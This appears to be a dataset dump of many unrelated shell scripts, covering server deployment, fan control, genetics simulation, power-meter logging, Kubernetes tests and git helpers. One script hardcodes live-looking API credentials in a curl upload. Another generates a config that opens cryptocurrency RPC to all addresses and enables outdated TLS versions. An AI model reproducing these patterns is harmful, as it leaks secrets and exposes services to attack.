PARTICLD_USER_PASSWORD=$(tr -dc '[:alnum:]' < /dev/urandom | head -c20)
echo " PARTICLD_USER_PASSWORD=${PARTICLD_USER_PASSWORD}"

echo "[*] GENERATING CCS.ENV FILE"
cat >./ccs.env <<EOL
APP_URL=http://${HOSTNAME}
DB_CONNECTION=mysql
DB_HOST=mysql
DB_PORT=3306
DB_DATABASE=crowdfund
DB_USERNAME=crowdfunduser
DB_PASSWORD=${MYSQL_USER_PASSWORD}
RPC_URL=http://watcher-particl-core:51935/
RPC_USER=crowdfunduser
RPC_PASSWORD=${PARTICLD_USER_PASSWORD}
COIN=particl
REPOSITORY_URL=${PROP_REPO_URL}
GITHUB_ACCESS_TOKEN=${GITHUB_ACCESS_TOKEN}
EOL

echo "[*] GENERATING MYSQL.ENV FILE"
cat >./mysql.env <<EOL
MYSQL_ROOT_PASSWORD=${MYSQL_ROOT_PASSWORD}
MYSQL_DATABASE=crowdfund
MYSQL_USER=crowdfunduser
MYSQL_PASSWORD=${MYSQL_USER_PASSWORD}
EOL

echo "[*] GENERATING NGINX FILE"
# BUG FIX: \$uri was escaped below but \$query_string was not, so the
# generated config contained "/index.php?" with the nginx variable
# expanded away (to empty) by this shell at generation time.
cat >./ccs.nginx <<EOL
server {
    listen 80 default_server;
    listen [::]:80 default_server;
    listen 443 ssl http2;
    listen [::]:443 ssl http2;
    root /var/www/html/ccs-front/_site/;
    index index.php index.html;
    server_name ${HOSTNAME};
    ssl_certificate /etc/ssl/certs/ccs-https.crt;
    ssl_certificate_key /etc/ssl/private/ccs-https.key;
    ssl_protocols TLSv1.2 TLSv1.1 TLSv1;
    location / {
        try_files \$uri \$uri/ /index.php?\$query_string;
    }
    # pass the PHP scripts to FastCGI server
    #
    location ~ \.php$ {
        root /var/www/html/ccs-back/public/;
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php7.4-fpm.sock; # change to correct version
    }
}
EOL

echo "[*] GENERATING SELF SIGNED TLS CERTIFICATES WHICH LAST 100 YEAR"
openssl req -x509 -nodes -days 36500 -newkey rsa:2048 -keyout ccs-https.key -out ccs-https.crt -subj "/C=GB/ST=London/L=London/O=Global Security/OU=IT Department/CN=${HOSTNAME}"

echo "[*] GENERATING PARTICLD CONF FILE"
cat >./data/particld/particl.conf <<EOL
rpcuser=crowdfunduser
rpcpassword=${PARTICLD_USER_PASSWORD}
rpcbind=0.0.0.0
rpcallowip=::/0
rpcport=51935
printtoconsole=1
EOL

echo "[*] GENERATING CRON FILE"
# Generated Python loop: pull site/proposals, rebuild the jekyll site,
# dump the DB (dropping the dump's timestamp line so diffs stay clean)
# and push the backup — every 30 seconds.
cat >./cron.py <<EOL
from subprocess import call, os
mysql_env = os.environ.copy()
mysql_env["MYSQL_PWD"] = "${MYSQL_ROOT_PASSWORD}"
import time
while True:
    call(["git","-C","/var/www/html/ccs-front","pull"])
    call(["git","-C","/var/www/html/ccs-back/storage/app/proposals/","pull"])
    call(["php","/var/www/html/ccs-back/artisan","schedule:run"])
    call(["jekyll","build","--source","/var/www/html/ccs-front","--destination","/var/www/html/ccs-front/_site"])
    print("updated website to latest state")
    call("/usr/bin/mysqldump -P 3306 -h mysql -u root crowdfund > /var/www/html/ccs-db/backup.sql", shell=True, env=mysql_env)
    call("head -n -1 backup.sql > t.sql", shell=True, cwd="/var/www/html/ccs-db")
    call(["mv","t.sql","backup.sql"], cwd="/var/www/html/ccs-db")
    call(["git","add","."], cwd="/var/www/html/ccs-db")
    call(["git","commit","-a","-m","\"db backup\""], cwd="/var/www/html/ccs-db")
    call(["git", "push"], cwd="/var/www/html/ccs-db")
    time.sleep(30)
EOL

echo "MANUAL: place wallet file in ./data/particld and hit enter"
read -r WALLET_ENTERED

FILE=./data/particld/wallet.dat
if [ -f "$FILE" ]; then
    echo "$FILE exists."
else
    echo "$FILE does not exist. Exiting."
    # Exit non-zero: this is an error path, a bare `exit` returned 0.
    exit 1
fi

touch data/nginx/ccs-back/storage/app/complete.json
touch data/nginx/ccs-back/storage/app/proposals.json

echo "[*] BUILDING DOCKER IMAGE"
docker build -t crowdfunding-backend -f crowdfunding.Dockerfile ./data/context

echo "[*] DONE!"
| true |
f66f04b72e8e2cb7ccde3d88429b7040270500d4 | Shell | ujjaldey/uWaiPi | /sources/startup.sh | UTF-8 | 1,920 | 2.734375 | 3 | [] | no_license | #!/bin/bash
# -*- coding: utf-8 -*-
###################################################################################################
# __ __ _ ____ _
# _ \ \ / /_ _(_) _ \(_)
# | | | \ \ /\ / / _` | | |_) | |
# | |_| |\ V V / (_| | | __/| |
# \__,_| \_/\_/ \__,_|_|_| |_|
#
# Copyright (c) 2016 Ujjal Dey
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software
# and associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
###################################################################################################
##############################################################################
# Script to start the applications. To be added in Crontab using: sudo crontab -e
##############################################################################

# Source the .configurePath file that sits next to this script.
# (dirname replaces the old `sed s/$fileName/.configurePath/g` trick,
# which substituted every occurrence of the file name anywhere in the
# path and broke on sed metacharacters.)
script_path=$(realpath "$0")
config_path="$(dirname "$script_path")/.configurePath"
. "$config_path"

# Launch from the configured installation directory; bail out rather than
# running the startup scripts from the wrong working directory.
cd "$UWAIPI_INSTALLATION_PATH" || exit 1
./loadOnStartup.sh
sleep 5
# Keep the watchdog running in the background.
./keepRunning.sh &
| true |
996607a77ec6f4cd6efd4c004dee26ed653d6249 | Shell | gavin-su/thrift-bench | /client/calc_stdev.sh | UTF-8 | 262 | 3.265625 | 3 | [] | no_license | #!/bin/bash
# Extract per-request timings from a benchmark log and hand them to
# calc_stdev.py. Column 2 of the "used" lines is divided by 1000
# (presumably microseconds -> milliseconds — TODO confirm units).
#
# Usage: calc_stdev.sh LOGFILE
LOGFILE=$1
RESULTFILE="stdev.$LOGFILE"

# Drop error lines, keep "used" lines, scale column 2.
# NOTE(review): intentionally appends (>>), so repeated runs accumulate
# into the same result file — confirm that is the desired behavior.
grep -v err "$LOGFILE" | grep used | awk '{printf "%0.2f\n", $2/1000}' >> "$RESULTFILE"

# A standard deviation needs at least two samples.
LINE=$(wc -l < "$RESULTFILE")
if [ "${LINE}" -le "1" ]
then
    exit 0
fi
./calc_stdev.py "$RESULTFILE"
| true |
093124786ecbb4907253c60903fc2bfbc194f80a | Shell | jmamma/r630 | /r630_fan.sh | UTF-8 | 1,497 | 3.296875 | 3 | [] | no_license | #!/bin/bash
# Fan-curve configuration for the Dell R630 fan controller loop below.
SPEED_MIN=17.0   # floor value written to the fans via ipmitool raw 0x30 0x30 0x02
SPEED_HIGH=40.0  # cap for the computed fan value
TEMP_MIN=75.0    # deg C where the ramp starts; below this the floor is used
TEMP_MAX=85.0    # deg C where the ramp reaches SPEED_HIGH
SCALAR=1.0       # exponent fed to pow() in the curve; 1.0 gives a linear ramp
DELAYMAX=10      # minimum seconds between fan speed *decreases*
# to_int FLOAT — print the integer part of a decimal string by truncating
# at the first '.' (e.g. "17.5" -> "17", "85" -> "85").
function to_int() {
    # Pure parameter expansion: avoids the unquoted `echo $1 | cut`
    # subshell and is safe against word splitting of the argument.
    printf '%s\n' "${1%%.*}"
}
# Take over fan control from the iDRAC (Dell raw command; 0x00 argument —
# presumably "manual" mode, confirm against Dell IPMI documentation).
ipmitool raw 0x30 0x30 0x01 0x00
TEMP_MIN_INT=$(to_int $TEMP_MIN)
# NOTE(review): `auto` is never used below.
auto=255
lastspeed=0
# NOTE(review): TEMP_MAX_INT is never assigned anywhere in this script, so
# this prints an empty line; probably meant $(to_int $TEMP_MAX).
echo $TEMP_MAX_INT
# NOTE(review): this loop never terminates, so the final ipmitool call
# below (restoring automatic control) is unreachable.
while [ 1 ]; do
  # CPU package temperatures from lm-sensors; awk's ($0+0) strips the
  # "+NN.N°C" decoration down to a bare number.
  T1=$(sensors | grep "Package id 0" | awk '{ print $4 }' | awk '{print ($0+0)}')
  T2=$(sensors | grep "Package id 1" | awk '{ print $4 }' | awk '{print ($0+0)}')
  echo $T1 deg
  echo $T2 deg
  # Fail safe: treat a missing reading as very hot so the fans spin up.
  if [ -z $T1 ]; then
    T1=100
  fi
  if [ -z $T2 ]; then
    T2=$T1
  fi

  #SPEED_MAX=a(x-TEMP_MIN)^2 + speed_low
  # Curve coefficient A chosen so the ramp reaches SPEED_HIGH at TEMP_MAX.
  A=$(python3 -c "print(($SPEED_HIGH - $SPEED_MIN) / pow($TEMP_MAX - $TEMP_MIN, $SCALAR))")
  if [[ $T1 -ge $TEMP_MIN_INT ]] || [[ $T2 -ge $TEMP_MIN_INT ]]; then
    # Fan value for the hotter package, clamped to SPEED_HIGH.
    speed=$(python3 -c "print(int(min($SPEED_HIGH,$A * pow(max($T1,$T2) - $TEMP_MIN,$SCALAR)) + $SPEED_MIN))")
    if [ $speed -lt $lastspeed ]; then
      # Speed decrease: rate-limited to avoid oscillation. (last_time is
      # first set in the branches below; this branch cannot run before
      # then because lastspeed starts at 0.)
      #delay_max=$(python3 -c "print(int(($DELAYMAX / ($lastspeed - $speed))))")
      delay_max=$DELAYMAX
      echo "here" $(($(date +%s) - $last_time))
      if [ $(($(date +%s) - $last_time)) -lt $delay_max ]; then
        echo "wait $delay_max"
      else
        ipmitool raw 0x30 0x30 0x02 0xFF $speed
        lastspeed=$speed
        last_time=$(date +%s)
      fi
    else
      # Speed increase (or unchanged): apply immediately.
      echo Setting speed $speed
      ipmitool raw 0x30 0x30 0x02 0xFF $speed
      lastspeed=$speed
      last_time=$(date +%s)
    fi
  else
    # Both packages below the ramp threshold: pin the fans at the floor.
    echo "Setting lowest speed"
    ipmitool raw 0x30 0x30 0x02 0xFF $(to_int $SPEED_MIN)
  fi
done
# Restore automatic fan control (unreachable — see NOTE above).
ipmitool raw 0x30 0x30 0x01 0x01
| true |
ef2524b62208fc75a2d558cb9141a6c1a225137f | Shell | skyclub3/scct | /simulation_scripts/simulation/demography/structure/1.structure.sh | UTF-8 | 1,206 | 2.59375 | 3 | [
"LicenseRef-scancode-other-permissive"
] | permissive | # Simulate the structure model of YRI.
# Ne = 100000, u = 1.5 * 10^-8, r = 1.3 * 10^-8. L = 3m.
# theta = 4*Ne*u*L = 4*100000*1.5*10^-8*3*10^6 = 18000
# p = 4*Ne*r*L = 4 * 100000 * 1.3 * 10^-8 * 3 * 10^6 = 15600
# AF expansion:
# 200g/(4*100000) = 0.0005
# Ne_Africa_before expansion 24000 = 0.24
# EU expansion:
# 350/(4*100000) = 0.000875
# Ne_European_before expansion 7700 = 0.077
# EU out of africa: 3500/(4*100000) = 0.00875
# African ancestral expansion:
# 17000/(4*100000) = 0.0425
# Ne_before expansion: 12500 = 0.125
# 3pop substructure of YRI population.
# Time: 0g - 1000g: 0 - 0.0025
# Migration coefficient between sub-pop, 0 10 100.
# Sub-population size after the split: 0.24/4 = 0.06 (units of 4*Ne).
#
# Print one msms command line per migration coefficient; the output is
# meant to be executed by the caller (or pasted into a job script).
ss="0 10 100"
for s in ${ss}; do
    cmd="java -jar -Xmx30G ~/scct/msms.jar 240 300 -t 18000 -r 15600 -N 100000 -I 5 30 30 30 30 120 ${s} -m 1 5 0 -m 5 1 0 -m 2 5 0 -m 5 2 0 -m 3 5 0 -m 5 3 0 -m 4 5 0 -m 5 4 0 -en 0 1 0.25 -en 0 2 0.25 -en 0 3 0.25 -en 0 4 0.25 -en 0.0005 1 0.06 -en 0.0005 2 0.06 -en 0.0005 3 0.06 -en 0.0005 4 0.06 -ej 0.0025 4 1 -ej 0.0025 3 1 -ej 0.0025 2 1 -en 0.0025 1 0.24 -en 0.000875 5 0.077 -ej 0.00875 5 1 -en 0.0425 1 0.125 -threads 10 | gzip > AFR_CEU.sub.${s}.gz"
    printf '%s\n' "$cmd"
done
| true |
59152af36801e157bd2ae5a34822ff52401d118b | Shell | datenlord/datenlord | /scripts/datenlord_metrics_logging_test.sh | UTF-8 | 856 | 2.859375 | 3 | [
"MIT"
] | permissive | #! /bin/sh
set -o errexit
set -o nounset
set -o xtrace

# Need to wait for some time before metrics are collected by Prometheus.
PROMETHUES_WAIT_TIME=5
NGINX_VERSION="1.21.5"

# DatenLord metrics test: bring up the test pod (manifest path supplied via
# the DATENLORD_METRICS_TEST env var) and generate some file I/O through it
# so metrics are produced. Presumably the pod's html dir is backed by a
# DatenLord volume — confirm against the manifest.
docker pull "nginx:${NGINX_VERSION}"
kind load docker-image "nginx:${NGINX_VERSION}"
kubectl apply -f "$DATENLORD_METRICS_TEST"
kubectl wait --for=condition=Ready pod metrics-datenlord-test --timeout=120s
kubectl exec -i metrics-datenlord-test -- bash -c "echo test > /usr/share/nginx/html/testfile"
kubectl exec -i metrics-datenlord-test -- bash -c "cat /usr/share/nginx/html/testfile"
sleep "$PROMETHUES_WAIT_TIME"

# $() instead of backticks; quoted so empty output fails loudly under nounset.
NODE_IP=$(kubectl get nodes -A -o wide | awk 'FNR == 2 {print $6}')

# DatenLord logging test: the Elasticsearch index must hold at least one hit.
curl -s "http://${NODE_IP}:31001/k8s-csi-datenlord-*/_search" | python -c "import sys, json; assert json.load(sys.stdin)['hits']['total']['value'] > 0"
| true |
bfeeff74e31fd2221b76d2dd5cecafcdced13954 | Shell | diogopereira/SpeedTestCollector | /startspeedtest.sh | UTF-8 | 2,291 | 4.25 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Print command-line help for startspeedtest (called for -h and on any
# unrecognized option).
function usage
{
    echo "Usage: startspeedtest [OPTIONS]"
    echo ""
    echo "Options GNU long option Meaning"
    echo "-h --help Show this message"
    echo "-d <directory> --directory <directory> Destination file to where the result should be written. By default is in \"/var/www/speedtestresults\""
    echo "-o <filename> --testoutput <filename> If this option is used, the last output from the speedtest script will be kept in the designed location"
    echo "-s <script> --script <script> Speed test script. If this option is not used, by default, it will be used /root/SpeedTestCollector/speedtest-cli-modified"
}
#Starting script at time $hour...
# Timestamps used for the CSV row (hour) and the per-day file name (now).
hour=$(date +"%H:%M")
now=$(date +"%m_%d_%Y")
# Defaults; each may be overridden by the options parsed below.
directory="/var/www/speedtestresults"
output=""
script="/root/SpeedTestCollector/speedtest-cli-modified"
# Manual option loop (kept instead of getopts so the GNU-style long
# options work). Relies on "$1" expanding to empty once the positional
# parameters run out.
while [ "$1" != "" ]; do
    case $1 in
        -d | --directory )      shift
                                directory="$1"
                                ;;
        -o | --testoutput )     shift
                                output="$1"
                                ;;
        -s | --script )         shift
                                script="$1"
                                ;;
        -h | --help )           usage
                                exit
                                ;;
        * )                     usage
                                exit 1
    esac
    shift
done
#Defining output folder
file="$directory/result_$now.csv"
echo "Sending result to \"$file\""
tempOutput="/var/www/speedtestresults/output.txt"

#Checking if using $output
if [ -n "$output" ]
then
    echo "Using output \"$output\"."
    tempOutput="$output"
fi

#Execute script to test speed
# (the useless "$(echo $var)" wrappers around $script/$tempOutput were
# dropped — they added a subshell and broke on paths with spaces)
echo "Starting to execute the speed test..."
"$script" > "$tempOutput"
echo "Output saved at $tempOutput... retrieving values..."

#Retrive data from test — the speedtest output has the download figure on
# line 7 and the upload figure on line 9.
download="$(sed '7q;d' "$tempOutput")"
upload="$(sed '9q;d' "$tempOutput")"

if [ -z "$download" ]
then
    download="0"
fi
# Convert the decimal point to a comma for the CSV locale.
download="$(echo "$download" | sed -r 's/\.+/,/g')"

if [ -z "$upload" ]
then
    upload="0"
fi
upload="$(echo "$upload" | sed -r 's/\.+/,/g')"

echo "Download speed at $download"
echo "Upload speed at $upload"

echo "Saving data..."
echo "$hour;$download;$upload" >> "$file"

#If no output was set, remove file, otherwise, keep it
if [ -z "$output" ]
then
    echo "Removing temporary files..."
    rm "$tempOutput"
fi

echo "Done."
| true |
2081b5a8527e46539d63c5ba7defa36c3859ff8b | Shell | tvararu/smib-commands | /update.sh | UTF-8 | 717 | 3.1875 | 3 | [] | no_license | #!/bin/bash
# Update the smib checkout and schedule a bot restart if HEAD moved.
# $1 is a label (e.g. the requesting nick) echoed back in status messages.
cd /home/irccat/smib || exit 1

#what commit are we now?
COMMIT=$(git rev-parse HEAD)

# Stash local edits around the pull; if either the pull or the stash pop
# ends in a merge conflict, a manual update is needed.
git stash --quiet
git pull --quiet origin master
pull_status=$?
git stash pop --quiet
pop_status=$?

# BUG FIX: this previously tested `$?` of `git stash pop` only, so a
# failed pull went unreported whenever the pop happened to succeed.
if [ "$pull_status" -eq 0 ] && [ "$pop_status" -eq 0 ]; then
    echo -n "$1: git pull finished successfully. "
else
    echo -n "$1: git pull failed, probably merge conflict, do it yourself. "
    exit 0;
fi

#did we actually change?
if [ "$COMMIT" = "$(git rev-parse HEAD)" ]; then
    echo "No changes, stop that."
    exit 0;
fi

#make the new bot live (systemd respawn)
echo "HEAD is now at \"$(git log --oneline -n 1)\", will shortly kill myself, goodbye world! :-("
echo '/usr/bin/killall smib.pl' | /usr/bin/at now + 1 minutes 2>/dev/null
| true |
c004248eb772b87030e047e82fc15fa777e202f0 | Shell | m-lab/neubot-support | /deploy.sh | UTF-8 | 888 | 3.6875 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/sh
# Public domain, 2013 Simone Basso <bassosimone@gmail.com>

#
# Manually deploy the RPM on M-Lab
#
# Usage: deploy.sh rpm host [host ...]
# Set DEBUG to a command prefix (e.g. "echo") to dry-run the remote steps.

DEBUG=

if [ $# -lt 2 ]; then
    echo "usage: $0 rpm host [host ...]" 1>&2
    exit 1
fi

RPM=$1
shift

# "$@" (not $*) so host names survive word splitting intact.
for SLIVER in "$@"; do
    echo "=== BEGIN DEPLOY $SLIVER ==="
    (
        # Subshell with -e: any failing step aborts this host only.
        set -e
        $DEBUG mlab_scp "$RPM" "$SLIVER:"
        $DEBUG mlab_ssh "$SLIVER" sudo init/stop.sh || true
        # Note: avoid sliver recreation
        $DEBUG mlab_ssh "$SLIVER" sudo rm -f /etc/mlab/slice.installed
        $DEBUG mlab_ssh "$SLIVER" sudo yum -y update "$RPM"
        # Idempotent
        $DEBUG mlab_ssh "$SLIVER" sudo touch /etc/mlab/slice.installed
        $DEBUG mlab_ssh "$SLIVER" sudo init/initialize.sh || true
        $DEBUG mlab_ssh "$SLIVER" sudo init/start.sh || true
        $DEBUG mlab_ssh "$SLIVER" rm "$RPM"
    )
    echo "=== END DEPLOY $SLIVER ==="
    echo ""
    echo ""
    sleep 30
done
| true |
a28db7f9f63cdf21e82a60db2b2e5c0f3165ff13 | Shell | sushena/Scripts | /Shell/SG_and_GCD_1_install_v1.sh | UTF-8 | 1,080 | 3.96875 | 4 | [] | no_license | #!/bin/bash
# Print usage and exit non-zero (called on any option-parsing problem).
usage() { echo "Usage: $0 [-y <yum command, either install or update>] " 1>&2; exit 1; }

YUM_CMD=
set -e
# Parse -y <cmd>; the leading ':' silences getopts' own error messages.
while getopts ":y:" o; do
    case "${o}" in
        y)
            YUM_CMD=${OPTARG}
            ;;
        *)
            usage
            ;;
    esac
done
shift $((OPTIND-1))

# NOTE(review): usage advertises "install or update", but only "install"
# is implemented — "-y update" falls through to "Invalid entry" below.
if [[ ! -z "${YUM_CMD}" && "${YUM_CMD}" == "install" ]]
then
	#echo -e "I am into _main_ ${YUM_CMD} \n"
	echo -e "*** Please update the REPO to se-server-experimental ***\n"
	echo -e "Initialiazing the repo \n"
	sudo yum makecache fast
	echo -e "Installing Senti-Configure \n"
	sudo yum -y install sentient-configure
	echo -e "1, Update the IP of other components under path /etc/sentient-configure/sentient-configure.conf
	2, Update email,Domain and credentials under path /etc/sentient-configure/.secrets/sentient-configure.properties \n"
	echo -e "**********************************\n"
	echo -e "Then proceed with script 2 for further setup\n"
else
	echo -e "Invalid entry \n"
	exit 1
fi
| true |
7e38b046205eb5d637a2513c9918de463984a07a | Shell | alces-software/flight-appliance-support | /aws-cloudformation/aws-tools/extras/custom-cloudwatch/put-queued.sh | UTF-8 | 497 | 2.65625 | 3 | [] | no_license | #!/bin/bash -l
# Publish the current number of queued SGE jobs as a CloudWatch custom
# metric for the given autoscaling group.

# Compute group name should be fed in through cloud-init or other means
asg_name="alces1-ComputeGroup-13L5PPGC0IG6V"

# AWS requires the timestamp in this ISO-8601-with-millis format.
ts=$(date +'%Y-%m-%d'T'%T'.000Z)

# qstat prints a two-line header; every later line is one queued entry.
queued_jobs=$(qstat -u \* | awk 'NR > 2{print $5}' | wc -l)

/opt/clusterware/opt/aws/bin/aws cloudwatch put-metric-data \
    --region "eu-west-1" \
    --metric-name Queued \
    --namespace "ALCES-SGE" \
    --dimensions "AutoScalingGroupName=${asg_name}" \
    --value "$queued_jobs" \
    --timestamp "$ts"
| true |
97e0a158b3ef748e6099b1e4b6a1a1ec58007e7a | Shell | flyrjh/ekm | /get-meter-data.sh | UTF-8 | 1,061 | 3.4375 | 3 | [] | no_license | #!/bin/sh
# 2014-11-20 Joe Hughes ekm@skydoo.net
# This script runs a program that gets RS-485 data from an EKM OmniMeter v4,
# saves the data to a csv file, and calls 'curl' to upload to wattvision.com
# This script is meant to be called from cron every minute, and should not
# generate any output other than what goes in the listed files.

# NOTE(review): $$-based temp names in a shared directory are predictable;
# consider mktemp.
OUT=/mnt/nas/ekm/$$.tmp
LOG=/mnt/nas/ekm/log.csv
#DT=`date "+%Y%m%d-%H%M%S"`
# Unix epoch timestamp, also used as the rrdtool update key below.
DT=`date +%s`

# Read the meter; one silent retry after a second before giving up.
/root/bin/ekm > $OUT
RC=$?
if [ "$RC" -ne 0 ]; then
  sleep 1
  # try again
  /root/bin/ekm > $OUT
  RC=$?
  if [ "$RC" -ne 0 ]; then
    rm $OUT
    exit;
  fi
fi

# Meter output columns: 1=kWh total, 2/3=per-phase values, 4=current watts
# (per the variable names; confirm against /root/bin/ekm's format).
KWH=`cat $OUT | awk '{print $1}'`
P1=`cat $OUT | awk '{print $2}'`
P2=`cat $OUT | awk '{print $3}'`
WATTS=`cat $OUT | awk '{print $4}'`
rm $OUT

echo $DT,$KWH,$P1,$P2,$WATTS>> $LOG

# NOTE(review): the wattvision api_id/api_key are hardcoded here in clear
# text — consider moving them to a root-only config file.
curl -d "{\"sensor_id\":\"15909802\",\"api_id\":\"vifpx9ty568qw7d4tqggf8bcgk06q56p\",\"api_key\":\"51pupxvatzj4r2u7fb4dmkpo46q2znlb\",\"watts\":\"$WATTS\",\"watthours\":\"$KWH\"}" http://www.wattvision.com/api/v0.2/elec >/dev/null 2>&1

#rrdtool update /mnt/nas/ekm/prod.rrd $DT:$WATTS
rrdtool update /mnt/nas/ekm/prod.rrd $DT:$KWH:$P1:$P2:$WATTS
| true |
7a8d9cc6f55cfc549c1cd6a3128d6d242f85aaf6 | Shell | jtsagata/ultimate-colors | /support/setup-dir-colors | UTF-8 | 744 | 3.6875 | 4 | [] | no_license | #!/usr/bin/env bash
# With ideas from:
# https://github.com/seebi/dircolors-solarized
#
# Usage: setup-dir-colors <Scheme>  (a directory under ../gnome-colors)
# Set show_sample=ON in the environment to list a demo tree afterwards.

SCHEME=$1

dir=$(dirname "$0")
scheme_dir=$dir/../gnome-colors/$SCHEME

if [ ! -d "${scheme_dir}" ] ; then
    echo "Invalid profile. Choose Light or Dark"
    # Exit non-zero: the bare `exit;` here returned the echo's status (0),
    # so callers could not detect the bad-profile case.
    exit 1
fi

dircolors_file="${HOME}/.config/dotfiles/dircolors"
# Install the chosen palette and repoint the generic symlink at it, then
# load it into this shell ( $() instead of the old backtick eval ).
cp "$scheme_dir/dircolors" "${dircolors_file}-$SCHEME"
ln -sf "${dircolors_file}-$SCHEME" "${dircolors_file}"
eval "$(dircolors "${dircolors_file}")"

#
# Demo
#
if [[ "$show_sample" == "ON" ]]; then
    if [ ! -d "/tmp/dircolors-solarized-demo" ] ; then
        mkdir -p /tmp/dircolors-solarized-demo
        sudo tar xfj "$dir/support/test-directory.tar.bz2" -C /tmp/dircolors-solarized-demo
    fi
    command ls --color /tmp/dircolors-solarized-demo/test-directory
fi | true |
352c4f64058eccd1cfe2556c5dfc7d0c269f71e2 | Shell | doegox/nfc-live | /content_for_iso/driver-scl3711/add.sh | UTF-8 | 473 | 3 | 3 | [] | no_license | #!/bin/bash
# Unpack the proprietary SCL3711 PC/SC driver bundle into the live-build
# chroot overlay and merge the local config tree.
# NOTE(review): a glob inside `[ -e ... ]` errors out ("too many
# arguments") if more than one archive matches — confirm only one
# scx371x_*_linux_32bit.tar.gz is ever present in download/.
if [ ! -e download/scx371x_*_linux_32bit.tar.gz ]; then
	echo "SCL3711_driver: Error missing archive scx371x_*_linux_32bit.tar.gz, please run prepare.sh first"
	exit 1
fi
mkdir -p ../@config/includes.chroot/usr/lib/pcsc/drivers/
# Extract only the SCx371x.bundle subtree, dropping the top two path
# components so it lands directly under drivers/.
tar xzf download/scx371x_*_linux_32bit.tar.gz --wildcards --strip-components=2 -C ../@config/includes.chroot/usr/lib/pcsc/drivers/ scx371x_*_linux_32bit/proprietary/SCx371x.bundle
mkdir -p ../@config
rsync -av config/ ../@config
| true |
2a4d5a62622da278602c96fc04c5c1e1cc99ceb1 | Shell | jiazhang0/meta-rpm-signing | /recipes-devtools/rpm/files/rpm-key-import.sh | UTF-8 | 256 | 3.34375 | 3 | [] | no_license | #!/bin/sh
# Import every RPM GPG key found under the system key directory.
keydir="/etc/pki/rpm-gpg"

# Nothing to do (and not an error) when the key directory is absent.
[ ! -d "$keydir" ] && exit 0

# Iterate the glob directly instead of parsing `ls` output, which breaks
# on unusual file names. When the glob matches nothing it stays a literal
# pattern, and the -f guard skips it.
for keyfile in "$keydir"/RPM-GPG-KEY-*; do
    [ ! -f "$keyfile" ] && continue
    ! rpm --import "$keyfile" &&
        echo "Unable to import RPM key $keyfile" && exit 1
done

exit 0
| true |
0706d6d1d159175f32ea56bc71155535c5868f55 | Shell | katsuyukishimbo/SesLambda | /scripts/create_s3.bash | UTF-8 | 693 | 3.453125 | 3 | [] | no_license | #!/usr/bin/env bash
#
# example:
#  ./create_s3.bash
#  ./create_s3.bash --prd

set -e
cd "$(dirname "$0")"

readonly TEMPALTE_FILE="./s3_template.yml"

env="stg"

# "--prd" switches the deployment to production; default is staging.
[[ "${1:-}" = "--prd" ]] && isPrd=true || isPrd=false

"${isPrd}" && echo "****** Create Bucket Production Mode!!! ******"
"${isPrd}" && env="prd"

stack_name="${env}-email-bounce-bucket"

# BUG FIX: the deploy command previously ended with a trailing backslash,
# which line-continued the *next* `aws` invocation (and the final
# `exit 0`) into its argument list instead of running them as separate
# commands.
aws cloudformation deploy \
    --stack-name "${stack_name}" \
    --template-file "${TEMPALTE_FILE}" \
    --parameter-overrides \
        Env="${env}" \
    --profile us-east-1-user

aws cloudformation update-termination-protection \
    --enable-termination-protection \
    --stack-name "${stack_name}" \
    --profile us-east-1-user
exit 0 | true |
754143eeee73a2a1099b068fb948371895b76dbb | Shell | gavinning/fast-deploy | /deploy.sh | UTF-8 | 518 | 2.796875 | 3 | [] | no_license | #!/bin/bash
# Pack the current npm project and upload the tarball to the fast-deploy
# server, which unpacks it into $folder and optionally runs $cmd
# (URL-encoded) afterwards.
folder="app/fe"
server="http://127.0.0.1:9500"
# cmd="npm%20install%20%26%26%20pm2%20startOrReload%20ecosystem.config.dev.json"
# cmd="npm%20i%20&&%20npm%20run%20build"
cmd=""

mkdir -p .deploy/
# NOTE(review): without `shopt -s globstar` this ** behaves like a single
# *, i.e. it only removes .deploy/*.tgz — which matches what is staged
# below, so it works; confirm no recursive cleanup was intended.
rm -f .deploy/**.tgz

# $() instead of backticks; quote the tarball name everywhere.
file=$(npm pack)
mv "$file" ./.deploy/

echo
echo "PACK: $file"
echo "FOLDER: $folder"
echo "CMD: ${cmd}"
echo
echo UPLOADING...
echo

curl \
    -F "file=@./.deploy/${file}" \
    "${server}/deploy?afterRun=${cmd}&folder=${folder}"

echo ---
echo "[deploy]: $server"
echo "[server]: $server"
echo
| true |
878627b60877049d17858abaddfedc066e81b4ba | Shell | moisesguimaraes/dotfiles | /bin/hack | UTF-8 | 614 | 3.921875 | 4 | [
"MIT",
"BSD-3-Clause"
] | permissive | #!/bin/bash -e
# hack: Rebase the latest changes from upstream into your feature branch

# Bail out quietly when not on a branch (detached HEAD).
CURRENT=$(git symbolic-ref --short HEAD) || exit 0

if [[ $CURRENT == "main" ]] || [[ $CURRENT == "master" ]]; then
    echo -e "can't hack on $CURRENT"
    exit 0
fi

# Prefer an "upstream" remote / "main" branch, falling back to
# origin/master.
# NOTE(review): `git branch` output carries "* " markers and leading
# spaces; this works only because $MAIN is expanded unquoted below and
# word-splitting strips them — fragile, confirm before tightening quoting.
UPSTREAM=$(git remote | grep -w upstream || echo origin)
MAIN=$(git branch | grep -w main || echo master)

echo -e "Rebasing '$CURRENT' on top of '$UPSTREAM/$MAIN'"
git checkout $MAIN
git pull $UPSTREAM $MAIN

# When working from a fork, also push the refreshed main to origin.
if [[ $UPSTREAM == "upstream" ]]; then
    echo -e "Updating 'origin/$MAIN'"
    git push origin $MAIN
